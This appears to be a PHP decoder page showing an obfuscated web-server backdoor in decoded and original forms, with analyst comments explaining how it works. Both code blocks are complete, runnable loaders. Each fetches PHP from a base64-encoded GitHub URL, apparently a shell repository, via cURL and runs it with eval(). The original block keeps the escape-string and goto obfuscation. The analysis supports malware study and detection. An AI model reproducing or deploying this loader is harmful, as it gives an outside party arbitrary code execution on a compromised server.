
PHP Decode

<?php goto ctBdy; ZNccX: if ($script1 !== false && $script1 !== 404) { eval($x . $script..

Decoded Output download

<?php 
/*
 * Analyst notes. Only comments were added; the code line below is unchanged.
 *
 * Purpose: remote-code loader. The script downloads text with cURL and hands
 * it to eval(), so whoever controls the remote file decides what executes in
 * this PHP process. The downloaded payload is not part of this sample, so its
 * behaviour cannot be determined from here.
 *
 * Execution order once the shuffled goto labels are followed:
 *   1. ctBdy - get() is declared, then control jumps to JelzP.
 *   2. JelzP - $x is set to a PHP closing tag. eval() starts in PHP mode, so
 *              this prefix makes the fetched text parse like a whole file
 *              (literal output until the payload's own opening tag).
 *   3. rms8U - $url1 is produced by base64_decode().
 *   4. GfGMm - $url2 is produced by base64_decode().
 *   5. XMuPq - $script1 = get($url1).
 *   6. ZNccX - if $script1 is usable it is eval()'d; otherwise get($url2) is
 *              tried and eval()'d, or "Both attempts failed." is echoed.
 *   7. rSXrm - end of script.
 *
 * get($url): sends a header-only probe first (CURLOPT_NOBODY with
 * CURLOPT_HEADER), following redirects (CURLOPT_FOLLOWLOCATION). Only when
 * the reported status is 200 does it repeat the request with the body
 * enabled and return what curl_exec() gives back; any other status returns
 * false.
 *
 * Observations:
 *   - Both base64 literals are the same string. Decoded and defanged:
 *     hxxps://raw[.]githubusercontent[.]com/sekjhhh/shel/refs/heads/main/md5ini
 *     The "second attempt" therefore retries the same location.
 *   - The test `$script1 !== 404` is always true: get() returns either the
 *     curl_exec() result or false, never the integer 404.
 *   - The status check uses loose comparison (== 200).
 *   - Nothing checks the integrity or origin of the fetched text before it
 *     reaches eval().
 *
 * Defensive use: treat a file with this shape as a loader for further code.
 * Useful hunting signals are eval() applied to cURL output, shuffled goto
 * labels, and outbound requests from the web server to the URL above.
 */
 goto ctBdy; ZNccX: if ($script1 !== false && $script1 !== 404) { eval($x . $script1); } else { $script2 = get($url2); if ($script2 !== false) { eval($x . $script2); } else { echo "Both attempts failed."; } } goto rSXrm; JelzP: $x = "?>"; goto rms8U; GfGMm: $url2 = base64_decode("aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3Nla2poaGgvc2hlbC9yZWZzL2hlYWRzL21haW4vbWQ1aW5p"); goto XMuPq; XMuPq: $script1 = get($url1); goto ZNccX; rms8U: $url1 = base64_decode("aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3Nla2poaGgvc2hlbC9yZWZzL2hlYWRzL21haW4vbWQ1aW5p"); goto GfGMm; ctBdy: function get($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_NOBODY, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_URL, $url); curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); if ($http_code == 200) { curl_setopt($ch, CURLOPT_NOBODY, false); curl_setopt($ch, CURLOPT_HEADER, false); $data = curl_exec($ch); curl_close($ch); return $data; } else { curl_close($ch); return false; } } goto JelzP; rSXrm: ?>


Original Code

<?php
/*
 * Analyst notes. Only comments were added; the code line below is unchanged.
 *
 * This is the sample as submitted. Two obfuscation layers are visible:
 *   - Every double-quoted string is written as mixed octal (\NNN) and hex
 *     (\xNN) escapes, which PHP expands when it parses the literal. For
 *     example, the value assigned to $x is the two-character PHP closing tag.
 *   - Statements are shuffled and stitched together with goto labels, so the
 *     textual order is not the execution order.
 *
 * Execution order: ctBdy (declare get()) -> JelzP ($x) -> rms8U ($url1) ->
 * GfGMm ($url2) -> XMuPq ($script1 = get($url1)) -> ZNccX (eval or
 * fallback) -> rSXrm (end).
 *
 * Behaviour: get() probes a URL with a header-only cURL request and, when
 * the status is 200, fetches the body. The script then passes that body to
 * eval() behind the closing-tag prefix, so the remote file is executed as
 * PHP. If the first fetch yields nothing usable, $url2 is tried the same
 * way. The fetched payload is not part of this sample.
 *
 * The arguments to base64_decode() are themselves escape-encoded. Per the
 * decoded listing on this page, both expand to the same base64 text, so
 * $url1 and $url2 appear to name the same remote location.
 *
 * Detection note: scanners that match the plain strings "eval" or "curl"
 * still hit here, because only the string literals are escaped. URL or
 * domain matching needs the escapes expanded and the base64 decoded first.
 */
 goto ctBdy; ZNccX: if ($script1 !== false && $script1 !== 404) { eval($x . $script1); } else { $script2 = get($url2); if ($script2 !== false) { eval($x . $script2); } else { echo "\x42\x6f\164\150\40\x61\164\x74\145\x6d\160\164\163\x20\146\x61\151\154\x65\x64\x2e"; } } goto rSXrm; JelzP: $x = "\77\76"; goto rms8U; GfGMm: $url2 = base64_decode("\141\110\x52\x30\143\110\x4d\66\114\171\71\x79\131\130\143\x75\132\62\154\x30\141\x48\126\x69\144\130\116\x6c\143\155\x4e\x76\x62\156\122\x6c\142\x6e\x51\165\x59\62\x39\164\x4c\63\116\x6c\x61\x32\x70\157\141\x47\147\166\143\x32\x68\154\142\x43\x39\x79\132\127\132\172\x4c\x32\150\x6c\x59\127\x52\x7a\114\62\x31\150\x61\x57\64\166\x62\x57\x51\x31\141\127\x35\x70"); goto XMuPq; XMuPq: $script1 = get($url1); goto ZNccX; rms8U: $url1 = base64_decode("\141\x48\122\60\143\x48\115\x36\x4c\x79\x39\171\131\x58\x63\x75\132\x32\x6c\60\141\x48\126\151\x64\x58\x4e\154\143\x6d\116\166\x62\x6e\122\x6c\142\156\x51\x75\x59\62\71\x74\x4c\63\116\x6c\x61\62\160\x6f\x61\x47\x67\166\143\x32\150\x6c\142\x43\71\171\132\127\x5a\172\114\62\150\x6c\131\127\122\x7a\x4c\x32\x31\x68\x61\127\64\166\x62\x57\x51\61\141\127\x35\160"); goto GfGMm; ctBdy: function get($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_NOBODY, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_URL, $url); curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); if ($http_code == 200) { curl_setopt($ch, CURLOPT_NOBODY, false); curl_setopt($ch, CURLOPT_HEADER, false); $data = curl_exec($ch); curl_close($ch); return $data; } else { curl_close($ch); return false; } } goto JelzP; rSXrm: ?>

Function Calls

None

Variables

None

Stats

MD5 cee5d770aca70b359e7959c172c3109d
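Eval Count 0 (as reported by the decoder; the decoded output above still contains two eval() calls, both applied to remotely fetched content)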
Decode Time 53 ms